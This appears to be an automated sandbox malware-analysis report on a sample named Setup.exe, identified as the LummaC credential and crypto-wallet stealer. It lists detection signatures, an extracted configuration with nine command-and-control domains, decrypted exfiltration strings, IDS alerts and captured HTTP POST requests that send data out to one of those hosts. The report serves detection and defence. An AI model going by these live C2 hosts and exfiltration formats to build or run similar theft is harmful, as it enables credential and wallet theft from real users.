Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1577781
MD5:8af6db9955abed6390bc281e0430ddc3
SHA1:fce22724af26d5242f04697c893166051d1dc797
SHA256:150f955296353908a81bb4dca5c4a5b7563a057d5ed63f56831bee5234010e1c
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Setup.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 8AF6DB9955ABED6390BC281E0430DDC3)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["energyaffai.lat", "rapeflowwj.lat", "crosshuaht.lat", "necklacebudi.lat", "sustainskelet.lat", "simplerapplau.click", "aspecteirs.lat", "discokeyus.lat", "grannyejh.lat"], "Build id": "subscript--"}
SourceRuleDescriptionAuthorStrings
Setup.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000003.1765557136.0000000001190000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
          • 0x4ae7f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
          00000000.00000003.1703033346.0000000001189000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000000.1297460093.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              00000000.00000003.1483393033.000000000318E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Click to see the 4 entries
                SourceRuleDescriptionAuthorStrings
                0.0.Setup.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-18T18:29:36.301287+010020283713Unknown Traffic192.168.2.749738104.21.88.199443TCP
                  2024-12-18T18:29:41.250680+010020283713Unknown Traffic192.168.2.749749104.21.88.199443TCP
                  2024-12-18T18:29:47.238820+010020283713Unknown Traffic192.168.2.749764104.21.88.199443TCP
                  2024-12-18T18:29:50.238595+010020283713Unknown Traffic192.168.2.749769104.21.88.199443TCP
                  2024-12-18T18:29:57.255718+010020283713Unknown Traffic192.168.2.749784104.21.88.199443TCP
                  2024-12-18T18:30:03.299619+010020283713Unknown Traffic192.168.2.749795104.21.88.199443TCP
                  2024-12-18T18:30:09.409773+010020283713Unknown Traffic192.168.2.749805104.21.88.199443TCP
                  2024-12-18T18:30:14.346117+010020283713Unknown Traffic192.168.2.749819104.21.88.199443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-18T18:29:39.998247+010020546531A Network Trojan was detected192.168.2.749738104.21.88.199443TCP
                  2024-12-18T18:29:45.620212+010020546531A Network Trojan was detected192.168.2.749749104.21.88.199443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-18T18:29:39.998247+010020498361A Network Trojan was detected192.168.2.749738104.21.88.199443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-18T18:29:45.620212+010020498121A Network Trojan was detected192.168.2.749749104.21.88.199443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-18T18:30:13.913664+010020480941Malware Command and Control Activity Detected192.168.2.749805104.21.88.199443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Setup.exe.7128.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "rapeflowwj.lat", "crosshuaht.lat", "necklacebudi.lat", "sustainskelet.lat", "simplerapplau.click", "aspecteirs.lat", "discokeyus.lat", "grannyejh.lat"], "Build id": "subscript--"}
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.0% probability
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmpString decryptor: simplerapplau.click
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmpString decryptor: hRjzG3--VIKA
                  Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                  Source: unknownHTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49764 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49769 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49784 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49795 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49805 version: TLS 1.2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+0884E332h]0_2_02C272A2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov esi, ecx0_2_02C239FD
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ecx, eax0_2_02C2C3C7
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov edx, ecx0_2_02C3F3B2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov edx, esi0_2_02C3E362
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ebx, byte ptr [edx+esi]0_2_02C04302
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then push eax0_2_02C0D310
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax-00000254h]0_2_02C3C33F
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A2347758h0_2_02C24062
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], B22A55C5h0_2_02C16073
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then push esi0_2_02C22165
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h0_2_02C236C2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx-5557EE89h]0_2_02C0A6F2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh0_2_02C38612
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02C2462C
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edi, byte ptr [eax+ecx-32FA6DEDh]0_2_02C2778F
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_02C2C7AE
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then push ebx0_2_02C1E7B5
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_02C2C7BD
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then test eax, eax0_2_02C38762
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], E785F9BAh0_2_02C16769
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_02C2C76E
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov edx, esi0_2_02C1D715
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_02C0A4D2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ecx, eax0_2_02C284D4
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ecx, eax0_2_02C2C39B
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ecx, eax0_2_02C28499
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ecx, eax0_2_02C2C423
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp word ptr [eax+edi+02h], 0000h0_2_02C2942D
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then lea esi, dword ptr [ecx-000000F0h]0_2_02C2942D
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_02C35582
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then call dword ptr [00440D4Ch]0_2_02C3C5AC
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [ecx], si0_2_02C1E560
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [edi], ax0_2_02C1E560
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+0EEE75ACh]0_2_02C1E560
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_02C2B532
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_02C1CA71
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then jmp eax0_2_02C3DA23
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then jmp dword ptr [00444AACh]0_2_02C28BEC
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6Ch]0_2_02C0AB42
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [edi], ax0_2_02C0AB42
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+2Ch]0_2_02C08B72
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]0_2_02C08B72
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1Ch]0_2_02C18B3E
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 4B1CCCDDh0_2_02C0E8D9
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+31D77F86h]0_2_02C16882
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02C16882
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_02C2B9E2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov esi, ebp0_2_02C1D9FC
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov esi, ecx0_2_02C239FD
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+000003F8h]0_2_02C2D991
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ecx, eax0_2_02C3E942
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]0_2_02C1CEDF
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+08h]0_2_02C1AEE2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 888A0AE0h0_2_02C1AEE2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+08h]0_2_02C1AEE2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ecx, eax0_2_02C3BEB0
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+48AAB128h]0_2_02C0CE5E
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_02C2AF82
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02C27F99
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov edi, esi0_2_02C25F52
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], C703E6CDh0_2_02C0DF7D
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebp]0_2_02C3CF1B
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ecx, eax0_2_02C3BE33
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02C21CE2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then jmp edx0_2_02C23DCA
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then jmp edx0_2_02C23DD2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-5Fh]0_2_02C37D72
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ecx, eax0_2_02C0BD32
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-46A948C7h]0_2_02C1CD3D
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-25h]0_2_02C0CD3C
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+38h]0_2_02C0CD3C

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49805 -> 104.21.88.199:443
                  Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49749 -> 104.21.88.199:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49749 -> 104.21.88.199:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49738 -> 104.21.88.199:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49738 -> 104.21.88.199:443
                  Source: Malware configuration extractorURLs: energyaffai.lat
                  Source: Malware configuration extractorURLs: rapeflowwj.lat
                  Source: Malware configuration extractorURLs: crosshuaht.lat
                  Source: Malware configuration extractorURLs: necklacebudi.lat
                  Source: Malware configuration extractorURLs: sustainskelet.lat
                  Source: Malware configuration extractorURLs: simplerapplau.click
                  Source: Malware configuration extractorURLs: aspecteirs.lat
                  Source: Malware configuration extractorURLs: discokeyus.lat
                  Source: Malware configuration extractorURLs: grannyejh.lat
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49738 -> 104.21.88.199:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49749 -> 104.21.88.199:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49805 -> 104.21.88.199:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49795 -> 104.21.88.199:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49784 -> 104.21.88.199:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49819 -> 104.21.88.199:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49769 -> 104.21.88.199:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49764 -> 104.21.88.199:443
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: simplerapplau.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: simplerapplau.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OSOPAWUPKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12789Host: simplerapplau.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=95U070K97User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15021Host: simplerapplau.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ON1XKKPRLZQFFSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20376Host: simplerapplau.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SK7ROEO9QI62User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1185Host: simplerapplau.click
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SFZ7MPLOIWOP2ZQLACUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1114Host: simplerapplau.click
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: simplerapplau.click
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: simplerapplau.click
                  Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890224482.0000000001175000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                  Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: Setup.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                  Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                  Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: Setup.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: Setup.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                  Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: Setup.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                  Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0C
                  Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0N
                  Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: Setup.exeString found in binary or memory: http://ocsp.sectigo.com0
                  Source: Setup.exeString found in binary or memory: http://www.digicert.com/CPS0
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/buy.htm?dcp_beginbeuiafterafuiopenUsing_Trial_CopyThis
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/buy.htm?dcpregisteropenRegistered_SuccessfullyRegistered
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/buy.htmlatest_unreg_addBuy
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/buy.htmold_unreg_addBuy
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/download.htm7http://www.winxdvd.com/help/how-to-use-dvd-copy-pro
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/faq.htm1http://www.winxdvd.com/dvd-copy-pro/updatelog.htm9http:/
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/free-update.htm
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/free-update.htm?chlic13open
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/registered-update.htm
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/registered-update.htmThe
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/registered-update.htmlatest_reg_addEnjoy
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/registered-update.htmold_reg_addUpdate
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/upgradeini/upgrade.ini
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/upgradeini/upgrade.iniupgrade.iniD=
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/specialoffer/latest_giveaway_addBuy
                  Source: Setup.exeString found in binary or memory: http://www.winxdvd.com/specialoffer/old_giveaway_addBuy
                  Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
